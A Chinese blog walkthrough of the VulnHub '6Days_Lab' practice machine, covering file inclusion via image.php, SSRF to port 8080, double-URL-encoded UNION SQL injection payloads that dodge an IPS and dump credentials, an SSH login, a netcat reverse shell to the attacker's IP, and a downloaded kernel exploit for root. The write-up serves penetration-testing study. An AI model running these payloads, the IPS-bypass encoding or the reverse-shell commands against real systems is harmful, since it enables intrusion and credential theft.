6Days_Lab靶机

最新推荐文章于 2022-08-01 21:48:57 发布
最新推荐文章于 2022-08-01 21:48:57 发布
阅读量268 收藏 3
点赞数 1
分类专栏: OSCP靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/118517063
版权

总结放在前面:

本次的突破点是一张图片的包含出错引发的文件包含漏洞以及ssrf漏洞

<img src=http://xxxxxx/xxxx/xxx.jpg>  存在于image.php?src=http://xxx.com/xxx.jpg

刚看到这个页面以为是远程文件包含,结果是个本地文件包含

查看到配置文件,sql查看语句

通过端口的8080以及apache的配置信息看到8080是实际的监听端口而80是转发的端口

所以出现了ssrf漏洞

这里是实际的注入点

http://127.0.0.1:8080/xxx.php?xx=xxx

首先进行靶机的发现:

目标的靶机IP是192.168.0.176

随后进行端口检测

22端口—openssh的5.9p1 可以使用九头蛇或者弱口令检测工具爆破/也可以查看是否存在漏洞进行测试

80端口—apache2.2.22的中间件  存在IPS检测阻断系统

8080端口—是http的代理

我们先看下22端口这个openssh有没有已知漏洞  卒

打开网页寻找突破

这里有一个图片没有被加载出来,我们切换到源码查看

可以看出这里的图片src指向一个其他的超链接图片

Image.php中可能存在文件包含漏洞,我们把src替换成image.php

以上,可以看出image.php文件中变量src是用户可控并且无过滤。

首页我们用谷歌浏览器打开吧

这里的话我们查看输入的地方可以查看是否存在注入点,使用sqlmap进行扫描

扫描的同时我们看一下网站的目录结构

获取网站结构之后,我们使用刚刚检测出的文件包含对config.php文件进行查看

数据库名为fancydb

密码n0_\$\$_n0_g41ns

用户sellingstuff

在查看我们输入折扣码的页面

我们可以猜测,当我们输入折扣码的时候会玉数据库中比对查看是否存在,那么这里数据交互的地方就可能会出现漏洞,但是sqlmap没有显示结果,我们来查看下checkpromo.php的文件内容是什么?

可以看到我们输入的promocode变量直接拼接在sql查询语句中,可控且无过滤条件,妥妥的注入,但是存在IPS防御,我们采用双url编码进行绕过。

        1.url编码可以进行在线的网页进行编码:

                http://tool.chinaz.com/tools/urlencode.aspx

                网页中空格无法进行编码 卒

        2.也可以使用python3中quote函数进行编码:

                from urllib.parse import quote

                quote(“要编码的内容”)

                quote(“=”)

                双url编码:quote(quote(“==”))

        3.Bp中也可进行url编码

                Bp中无法实现我们所需要的双编码

url编码:

“=”经过url编码后为%3D

而双url编码就是将“%”再次进行编码为%25然后将3D拼接成为%253D

这样进行解码后首先对%25进行解码为%,再对%3D进行解码为“=”

$sql="SELECT discount,status FROM promocodes WHERE promocode='".$_GET['promocode'].‘";

根据查询语句可以看到,我们需要使用单引号做为闭合,并且前面存在两个字段

数据库名为fancydb

  1. 查看数据库中所有表

aaaa'union select group_concat(table_name,'```'),2 from information_schema.tables where table_schema=database()#

使用url双编码后

aaaa%2527union%2520select%2520group_concat%2528table_name%252C%2527%2560%2560%2560%2527%2529%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2523

我们将编码后的测试语句放入

似乎没有起作用,我们查看apaceh的默认配置路径:

Ubuntu默认配置文件为/etc/apache2/sites-available/default

还记得端口扫描的时候发现8080端口,网站实际是针对8080端口进行监听,而80端口是作为转发的端口,也就是说我们需要访问http://127.0.0.1:8080/checkpromo.php?promocode=这个路径才能实现注入攻击。

重新进行测试:

我们获取了fancydb数据库中的两个表名,其中users表为我们下一步进行测试的表

继续构造查询表下字段名的测试语句:

aaa'union select group_concat(column_name,'```'),2 from information_schema.columns where table_schema = database() and table_name = 'users'#

经过双编码后:

aaa%2527union%2520select%2520group_concat%2528column_name%252C%2527%2560%2560%2560%2527%2529%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253D%2520database%2528%2529%2520and%2520table_name%2520%253D%2520%2527users%2527%2523

查看users表下字段

继续查看fancydb数据库下,users表中,username与password字段的值

aa'union select group_concat(username,'````',password,'`````'),2 from fancydb.users#

aa%2527union%2520select%2520group_concat%2528username%252C%2527%2560%2560%2560%2560%2527%252Cpassword%252C%2527%2560%2560%2560%2560%2560%2527%2529%252C2%2520from%2520fancydb.users%2523

获得用户名:andrea  密码:SayNoToPentests

但是网页中并没有admin或者login等web控制页面登陆信息

我们直接使用ssh进行登陆

来到提权的步骤:

首先查看/etc/passwd这个文件是否可写

Help命令都不给用。

好家伙,nc –e我们把shell弹回来用。

Kali中我们执行  监听5555端口

nc –nvlp 5555

靶机中执行 我们kali的IP为192.168.0.119

Nc –e /bin/bash 192.168.0.119 5555

使用下面的python语句获取对话

python -c 'import pty;pty.spawn("/bin/bash")'

查看之前小结的提权步骤:

https://blog.csdn.net/Lonelyhat/article/details/105553797

要是有其他提权方法欢迎留言呀~大佬们~

/etc/passwd不能写入

Uname -a

这个版本有些古老啊

我们search一下

我们cp一下.c文件

找到.c文件

Cp过来

Cat一下查看

我们只需要编译后执行就可以了

开启python的http服务

python -m SimpleHTTPServer

进入tmp文件夹使用wget获取.c文件

Gcc编译

根目录下存在flag执行文件

梵歆
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
6Days_Lab-v1.0.1 - linux
战神/calmness的博客
01-22 364
目录 Download 信息收集 目录遍历 文件包含 调用了src函数 账户密码配置文件 passwd信息 查看apache默认配置信息 Python 通过ssrf+sql注入 获取当前数据库中的表 获取表中字段名 获取所需账号密码信息 SSH perl反弹shell 内核提权 搜索exp 参考链接 Download Back to the Top Please remember that VulnHub is a free community resource..
t6AdmX_new靶机
08-03
t6AdmX_new靶机
vulnhub靶场,6Days_Lab-v1.0.1
kukudeshuo的博客
07-08 429
vulnhub靶场,6Days_Lab-v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/6days-lab-11,156/#flags 目标:获取根目录下的flag 下载好靶机后,使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 1、获取靶机IP地址 kali攻击机输入netdiscover,不添加任何参数,会默认扫描机器网卡上的ip值的所有网段,获取到的靶机IP地址为192.168.58.143
OSCP - 6Days_Lab-v1.0.1 的破解
kevinhanser
02-23 2020
本文主要记录对 Lazysysadmin 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:6Days_Lab 初始安装,不知道IP,首先获取IP Currently scanning: 172.16.154.0/16 | Screen View: Unique Hosts ...
6Days_Lab-v1.0.1靶场
qq_45300786的博客
11-20 212
https://www.cnblogs.com/sym945/p/12154220.html
vulnhub靶机--6Day_Lab-v1.0.1
Tauil的博客
08-01 248
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入。双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞。但是没有回显内容,尝试进行反弹shell,在原终端输入。.....
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
一个OA项目,框架SSH 数据库是;mysql 前端是easy UI
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
安装部署Web安全测试用的靶机
11-24
个人作业,希望有所帮助
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
OSCP - 6Days_Lab-v1.0.1靶机
小小猪的博客
06-09 339
OSCP - 6Days_Lab-v1.0.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.232 访问 http://x.x.x.232 输入折扣码,提示代码过期,没啥用处 查看页面源码 访问,得到出错,可能存在ssrf 修改src=后边参数为index.php,并没有拦截,也没有报错 使用dirb http://x.x.x.232,获取靶机网站目录结构文件 打开BP进行抓包,发现响应包是主页界面,访.
【HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2880
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
OSCP 备考破解靶机系列
kevinhanser
02-18 3235
测试的 VM 主机主要来源 www.vulnhub.com VM - Lazysysadmin 的破解
backdoored
底层社会中的弱智
10-09 1904
总结: 目标靶机没有其他开放的端口,确定攻击方向就是1337 http服务端口。 访问页面后给出的flag位置提示,一个在用户文件夹下面还有root用户下面root.txt文件 使用提权的时候利用提权脚本,linpeas.sh+gtf进行搜索,找到tac命令进行提权。 直接访问/root/root.txt 获取最后的flag的值。 靶机评级:简单 需要一个好字典进行爆破 使用nmap 针对主机进行端口探测 仅出现1337端口为http服务 Nikto没有探测出信息 访问13
Android4
底层社会中的弱智
08-11 1618
总结: 物联网渗透中5555端口是安卓adb服务的默认监听端口,早些版本没有验证机制,所以遇到5555端口的话直接使用adb连接来尝试。 目标靶机IP:192.168.49.161 本机kaili的IP:192.168.49.129 查看开放的端口服务 22000开放ssh端口 8080是php-cli服务 5555端口是android服务默认的监听端口,也是物联网渗透中容易受到攻击的端口,在kali中首先安装adb后进行连接尝试。 安装adb连接工具 ADB工具的全称为 Andro
DC-3 步骤
底层社会中的弱智
09-18 1214
确认局域网中目标主机IP 确认目标开启的端口 确认IP为192.168.0.113 端口信息为:80端口 信息收集: 看得出使用joomla框架 针对性扫描 joomscan 确认版本号以及后台登陆页面,查到公开漏洞信息 存在注入,使用sqlmap进行注入先看看是否可以直接获取osshell以及sqlshell 卒 只能一步一步来 数据库 joomladb 表:#_users 选中username和password 查看密码 尝试使用john.
pwnlab_init
底层社会中的弱智
04-29 1055
找到目标IP 192.168.11.131 扫描端口 开放80端口 apache中间件版本暂无可用exp 3306mysql数据库 111 rdp远程桌面 先扫一下80的目录 看到config.php 然后可能存在注入 使用sqlmap无结果放弃注入 查看URL 可能存在文件包含 http://192.168.11.131/index.php?page=...
Kioptrix Level2
底层社会中的弱智
04-16 864
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
vulnhub之Five86-1
底层社会中的弱智
02-04 741
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
doubletrouble靶机
最新发布
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值